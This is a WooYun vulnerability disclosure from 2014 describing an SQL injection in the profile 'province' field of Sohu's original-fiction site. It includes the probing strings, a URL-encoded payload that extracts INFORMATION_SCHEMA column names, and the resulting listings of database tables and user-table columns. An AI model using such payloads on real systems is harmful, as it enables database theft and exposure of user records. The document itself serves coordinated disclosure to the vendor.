当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-069029

漏洞标题:搜狐原创小说频道SQL注入导致暴库(大量用户资料泄露)

相关厂商:搜狐

漏洞作者: 爱上电饭锅

提交时间:2014-07-19 18:33

修复时间:2014-09-02 18:34

公开时间:2014-09-02 18:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-19: 细节已通知厂商并且等待厂商处理中
2014-07-21: 厂商已经确认,细节仅向厂商公开
2014-07-31: 细节向核心白帽子及相关领域专家公开
2014-08-10: 细节向普通白帽子公开
2014-08-20: 细节向实习白帽子公开
2014-09-02: 细节向公众公开

简要描述:

搜狐原创小说频道个人中心存在SQL注入,可读取全部表资料。看着这个洞,想着搜狐某工周一又要加班了,总算踏实了。顺便问问,有没有狐狸公仔来一个?

详细说明:

前几天报的平行越权好像已经修复了,这大周末的怎么能再让搜狐某工加班呢?
为了避开UI验证,用直接Request到服务器的方法仔细打探了一下各个参数,最终发现“所在省份”表现奇特,应该存在SQL注入。首先试了以下参数:
1',msn='2',qq='3
更新后发现MSN和QQ并没有更新,但是地址变成了“1”。这说明更新成功了,但是为什么msn和qq没成功呢?两种可能:1.过滤了?2.覆盖了?
要是1就悲剧了,先乐观点试试2。用以下参数:
1',province='2',qq='3
走起!成功了!地址显示“2”!
接下来来点高级应用?INFORMATION_SCHEMA.TABLES?INFORMATION_SCHEMA.COLUMNS?
最终253个数据表(含系统表)一览无余,顺便看了一下用户基本信息表,里面有很多敏感信息,包括搜狐passport,剩余金币,月票数量等。
以下是截取表列表:
amonitor_log
amonitor_log_chapter
book_author_yc
book_author_yc_bak
book_book
book_bookmark
book_bookshell
book_book_bak
book_category_pri
book_category_sec
book_content
book_content_bak
book_volume
book_volume_bak
category_available
CHARACTER_SETS
CLIENT_STATISTICS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_TEMPORARY_TABLES
GLOBAL_VARIABLES
INDEX_STATISTICS
INNODB_BUFFER_POOL_PAGES
INNODB_BUFFER_POOL_PAGES_BLOB
INNODB_BUFFER_POOL_PAGES_INDEX
INNODB_CMP
INNODB_CMPMEM
INNODB_CMPMEM_RESET
INNODB_CMP_RESET
INNODB_INDEX_STATS
INNODB_LOCKS
INNODB_LOCK_WAITS
INNODB_RSEG
INNODB_SYS_INDEXES
INNODB_SYS_STATS
INNODB_SYS_TABLES
INNODB_TABLE_STATS
INNODB_TRX
js_data_cp
keywords_available
keyword_time
KEY_COLUMN_USAGE
multi_passport
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
QUERY_RESPONSE_TIME
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
sell_cp
sell_cp1
sell_cp_list
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TABLE_STATISTICS
TEMPORARY_TABLES
THREAD_STATISTICS
TRIGGERS
t_accounting_book_income
t_accounting_contract_book_file_info
t_accounting_contract_book_info
t_accounting_contract_info
t_accounting_cp_info
t_accounting_uploadbill_file_info
t_accounting_user
t_accounting_user_cp_info
t_account_recharge_log
t_account_recharge_log_test
t_admin_group
t_admin_groupmodule
t_admin_grouppermission
t_admin_groupuser
t_admin_module
t_admin_permission
t_author_account
t_author_action_log
t_author_application
t_author_application_type
t_author_base_info
t_author_consult_info
t_author_rates
t_author_systemmsg_log
t_author_welfare_income
t_blog
t_bookman_income
t_book_ad
t_book_base_info
t_book_base_info_recover
t_book_base_info_xiaxian
t_book_base_log
t_book_black_user
t_book_chapter
t_book_chapter_20130115_recover
t_book_chapter_content
t_book_chapter_cp_zhua
t_book_chapter_leave
t_book_chapter_month_subscription
t_book_chapter_recommend
t_book_chapter_subscription
t_book_class
t_book_content_report
t_book_income
t_book_info_modify_log
t_book_integral_channel
t_book_integral_exchange_code
t_book_integral_project
t_book_into_proportion
t_book_jifen_exchange_code
t_book_jifen_project
t_book_manager
t_book_mobile_rsync_list
t_book_month_subscription
t_book_publish
t_book_recommend
t_book_relation_Info
t_book_review
t_book_review_administrator
t_book_review_administrator_operation
t_book_review_back
t_book_section
t_book_single_work_subscription
t_book_vote
t_book_vote_item
t_book_xiaxian
t_copyright_partner
t_date_dimension
t_editor
t_editor_log
t_editor_message
t_editor_recommend
t_editor_recommend_period
t_editor_recommend_type
t_fmx_book_info
t_fxm_book_chapter
t_import_book_data
t_month_dimension
t_order_box_succ
t_order_sms_advance
t_order_sms_quit
t_order_sms_receive
t_order_sms_succ
t_pay_bank_log
t_pay_bank_log_test
t_stat_msohu_activate_user_count
t_stat_msohu_dianping_info
t_stat_msohu_downloadtimes_info
t_stat_msohu_search_info
t_stat_msohu_upload_info
t_stat_mxp_company_data_list
t_stat_mxp_company_templet_day_info
t_stat_mxp_compay_day_order_info
t_stat_mxp_days_order_info
t_stat_mxp_days_paytype_info
t_stat_mxp_days_transport_info
t_stat_mxp_day_success_info
t_stat_mxp_income_recharge_info
t_stat_mxp_templet_day_info
t_stat_mxp_transport_person_info
t_stat_mxp_trans_card_info
t_stat_mxp_user_info
t_stat_ting_charge_day_info
t_stat_ting_charge_toproduct_day_info
t_stat_ting_composite_order_info
t_stat_ting_download_to_phone_info
t_stat_ting_income_day_info
t_stat_ting_income_info
t_stat_ting_income_register_info
t_stat_ting_income_topaytype_day_info
t_stat_ting_iphone_income_info
t_stat_ting_listen_day_info
t_stat_ting_mail_corp_info
t_stat_ting_monincome_topaytype_day_info
t_stat_ting_month_income
t_stat_ting_pay_user_info
t_stat_ting_person_listen_info
t_stat_ting_product_info
t_stat_ting_product_order_info
t_stat_ting_search_day_info
t_stat_ting_sub_product_day_info
t_stat_ting_sub_product_info
t_stat_ting_union_income_info
t_stat_ting_user_day_info
t_stat_ting_user_day_info_temp01
t_stat_ting_user_day_info_temp02
t_stat_ting_user_day_info_temp03
t_stat_ting_user_day_info_temp04
t_stat_ting_user_day_info_temp05
t_stat_yc_activate_user
t_stat_yc_author_income
t_stat_yc_baoyue_day
t_stat_yc_baoyue_month
t_stat_yc_book_collect
t_stat_yc_book_sell
t_stat_yc_chapter_subscription
t_stat_yc_editor
t_stat_yc_search_log
t_stat_yc_user_consumer
t_stat_yc_user_consumer_log
t_stat_yc_user_recharge
t_stat_yc_user_recharge_log
t_stat_yc_vip_user
t_stat_yc_wap_user
t_system_message
t_table_test
t_tsw_pcdownload_dayinfo
t_user_action_log
t_user_base_info
t_user_base_info_bak0528
t_user_base_info_restore
t_user_base_info_temp
t_user_base_info_test
t_user_click_book_log
t_user_click_book_log_temp
t_user_click_book_log_test
t_user_code
t_user_collect_log
t_user_dashang_log
t_user_gain_jifen_log
t_user_huodong
t_user_huodong_log
t_user_indiv_service_set
t_user_level
t_user_level_power
t_user_mobile_send_log
t_user_personal_data
t_user_promotion_log
t_user_qiandao
t_user_read_book_set
t_user_recharge_log
t_user_recharge_log_test
t_user_vote_log
t_user_wap_pay_log
t_user_wap_subscribe_log
t_user_yuepiao_log
USER_PRIVILEGES
USER_STATISTICS
VIEWS
XTRADB_ADMIN_COMMAND
XTRADB_ENHANCEMENTS
yiruite_send
以下是t_user_base_info表的列:
amonitor_state
beforeamount
collected_num
collect_num
daka_date
icon_status
id
Integral
jifen
lastpaydate
lastreturntype
level
logdate
login_date
login_num
nickname
nickname_s
passport
passport_s
payamount
remain_coin
status
user_icon
user_type
yuepiao
这要是改一把,我是不是就可以在知识的海洋里畅读了?
但是我还是喜欢公仔,不知道有没有小狐狸公仔做个小礼物?

漏洞证明:

1. 抓包。
2. 把province参数改为。124%27%2Cprovince%3D(SELECT%20SUBSTRING(column_name%2C1%2C15)%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%20%3D%20%27t_user_base_info%27%20ORDER%20BY%20column_name%20LIMIT%2010%2C1)%2Cmsn%3D%272
3. 地址变为t_user_base_info中某列的名称。

QQ图片20140719215256.jpg

修复方案:

只好加班了

版权声明:转载请注明来源 爱上电饭锅@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-07-21 10:25

厂商回复:

感谢支持。

最新状态:

暂无